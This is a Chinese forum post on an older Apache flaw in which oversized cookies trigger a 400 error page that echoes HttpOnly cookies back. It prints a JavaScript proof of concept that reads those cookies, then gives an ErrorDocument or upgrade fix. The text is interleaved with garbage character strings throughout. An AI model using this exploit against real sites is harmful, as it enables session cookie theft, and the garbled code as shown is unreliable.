很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
5 L. {. w* ?) Q; b8 Y2 D$ ]) t, p+ f
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
8 Z, U# f" D; {" Z+ o' y 7 `5 S# |5 q0 X1 w# G
" t, D. @0 U7 |: ? W( r// http://www.exploit-db.com/exploits/18442/% v, h p2 y, ~* e- C+ W: l
function setCookies (good) {
$ }8 I% e. g2 }- B3 g// Construct string for cookie value1 }3 `: J$ }. A+ p% s5 V& |
var str = "";
! \: c$ o6 x N0 r7 b) Afor (var i=0; i< 819; i++) {1 }8 _* b- z/ f, G6 d9 c
str += "x";3 z+ S* T A0 P w2 v% h% D
}! o! m' T6 B7 V/ z
// Set cookies7 x5 q! p8 [: b7 H0 [, ~
for (i = 0; i < 10; i++) {+ V' d% o7 o5 D+ y5 C# J
// Expire evil cookie5 ^. }7 f3 F5 d$ _- m: l2 a7 h
if (good) { _- i+ p+ A; n; y- [+ M
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";! q+ `8 S! V; v
}, X; A' D; T! L$ A# c9 S/ b3 o
// Set evil cookie& O$ a4 O/ z0 k; p8 A: c: {& G
else {1 X3 i y8 g8 ?
var cookie = "xss"+i+"="+str+";path=/";8 I# s- z# d3 g2 ]# p$ d
}% C P7 D5 z2 ^+ I
document.cookie = cookie;
0 H) d! J; h+ Z1 t9 \ {% }/ P}
! `7 ]( X8 H% B- G}
) W( X9 \9 ]3 pfunction makeRequest() {- a$ w& V% W1 X( v( \2 y# c
setCookies();
: X W. p9 Y w; s- u3 x$ Vfunction parseCookies () {% z! B1 m7 C/ l b
var cookie_dict = {};' a( J, b, ?3 B7 Y( y
// Only react on 400 status7 {% l6 T2 v7 b- V! Y) V
if (xhr.readyState === 4 && xhr.status === 400) {
- l, Y9 v7 K/ [+ ?// Replace newlines and match <pre> content$ p+ m5 l3 f) O- [# ~' R* @7 e: x1 {
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);# ?: W! V) C( m4 Y
if (content.length) {
# d$ |/ {% ?4 r' W3 @6 Q// Remove Cookie: prefix; s# ]; P! r5 R4 g+ R$ p. f
content = content[1].replace("Cookie: ", "");
f9 Y% M0 r9 P! w* s, R3 Y3 @var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);+ M6 O$ h6 n6 _! G1 @( Z ?) K: x
// Add cookies to object
- `; `- e& a: yfor (var i=0; i<cookies.length; i++) {
8 l: {! B: w% g) r2 c& bvar s_c = cookies.split('=',2);
5 D1 U( J/ G. L$ k$ e! wcookie_dict[s_c[0]] = s_c[1];) w% Q3 y, r+ A$ i1 x% H
}
( J2 b x5 _7 W}
4 l* a0 c* q6 |$ `// Unset malicious cookies3 }8 W! O/ b$ W% }7 A1 P& M* I0 A
setCookies(true);1 f8 \1 N M* g9 _" j
alert(JSON.stringify(cookie_dict));
4 Z, `3 ^6 l! N& h/ j}# H; U0 O0 I- a0 K8 D; W9 U
}( h% |7 M5 {- N' Q; M; r! o, h
// Make XHR request
* z& I0 h) \$ @/ ovar xhr = new XMLHttpRequest();9 D' z/ b' E' K9 ]" _
xhr.onreadystatechange = parseCookies;& \, U+ q5 u# a) Y; [
xhr.open("GET", "/", true);8 W# A- i2 k9 N) U! ~' E
xhr.send(null);. C6 r, v- U: \2 V C$ r2 I
}( Z7 _( x2 N& e5 v4 w
makeRequest();
6 Y2 N) y( b N% M! B# x- u
/ _ y& Z7 `! X' Y3 h4 f- j你就能看见华丽丽的400错误包含着cookie信息。
5 t1 _0 L! s* H- s/ I0 X8 K- y& P' t
: [% D! o8 ?* r j下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#* @+ N6 }- z8 V3 X+ Y/ I
y, f/ l; }, A% Q0 N9 ?6 H: H/ R3 |修复方案:( E1 C0 p4 G/ z6 G5 f% [! T( F4 E
; E6 d8 Y( ]) n- ~Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
. |# w; a3 T; r5 m" q4 ^- t
3 ~& @6 C; w7 P% O5 w& {4 eIn the event of a problem or error, Apachecan be configured to do one of four things,& {+ ]* U) P) p: m
" s: T) n: ?( N+ ?# C% S1. output asimple hardcoded error message输出一个简单生硬的错误代码信息# d# Q* ~4 s- y
2. output acustomized message输出一段信息
3 K7 x* Q4 @4 i9 e" ~ C3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
2 I- B1 Y6 [4 C- L' N4. redirect to an external URL to handle theproblem/error转向一个外部URL$ I$ p/ F) w5 f; V j
; ~+ N+ x* _# q; `. F, M7 ?, T, S
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容' M! E/ K( q- R8 X/ t0 }4 r% a
j# b4 g5 a6 X1 SApache配置:; w* d* s$ @; U; t6 w
3 i' k1 W9 K- x4 zErrorDocument400 " security test"4 |3 e/ a" Y3 k8 L* H9 D* [
9 d) X, _" C( O当然,升级apache到最新也可:)。
( E: w5 ]1 @" f* d; G! v! Q: x- z- v# G3 s/ D- H
参考:http://httpd.apache.org/security/vulnerabilities_22.html
: [' g4 H0 w$ Y5 d C0 j M! M0 s) i* h0 \' _7 s. K8 q" O( q* t
|
发表于 2013-4-19 19:15:43
收藏
支持
反对